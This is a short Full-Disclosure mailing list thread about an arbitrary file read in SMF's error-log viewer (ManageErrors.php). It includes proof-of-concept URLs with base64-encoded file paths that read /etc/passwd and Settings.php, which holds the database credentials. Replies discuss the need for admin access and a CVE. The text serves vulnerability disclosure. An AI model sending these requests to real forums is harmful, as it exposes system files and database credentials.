The flaw is not exploitable without privileges. On some occasions there are forums where there are co-admistrators which have privileges to view the error log but not to modify code or at least read the mysql connection.
Not have CVE-ID. 2013/1/8 Carlos Alberto Lopez Perez <[email protected]> > On 07/01/13 15:54, WHK Yan wrote: > > *Summary:* > > -------------- > > A security flaw allows an attacker to know the full source file of the > web > > system. > > > > *Details: > > ----------- > > Sources/ManageErrors.php Line 340: > > // Make sure the file we are looking for is one they are allowed to look > at > > if (!is_readable($file) || (strpos($file, '../') !== false && ( > > strpos($file, $boarddir) === false || strpos($file, $sourcedir) === > false))) > > fatal_lang_error('error_bad_file', true, > > array(htmlspecialchars($file))); > > > > Bypass function strpos($file, '../'), no need "../", example: > > /home/foo/www/Settings.php > > > > *PoC: > > ------- > > > http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q= > > Read /etc/passwd > > > > works with path disclosure for read Settings.php: > > http://whk.drawcoders.net/index.php/topic,2792.0.html > > > > *Reproduce: > > 1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts > > 2. Get full path of web app ( /home/1337/public_html/SSI.php ). > > 3. Exploit in base64: > > > http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA= > > To read /home/spadmin/public_html/Settings.php > > > > Referer and Mirror: > > ------------------------- > > http://whk.drawcoders.net/index.php/topic,2805.0.html > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > Hi! > > > I have verified SMF is affected by this issue. > > The PoC requires an admin login to be exploited. Is there any > possibility to exploit this issue without an admin login? > > > I guess a CVE should be assigned. Do you already asked for one? > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
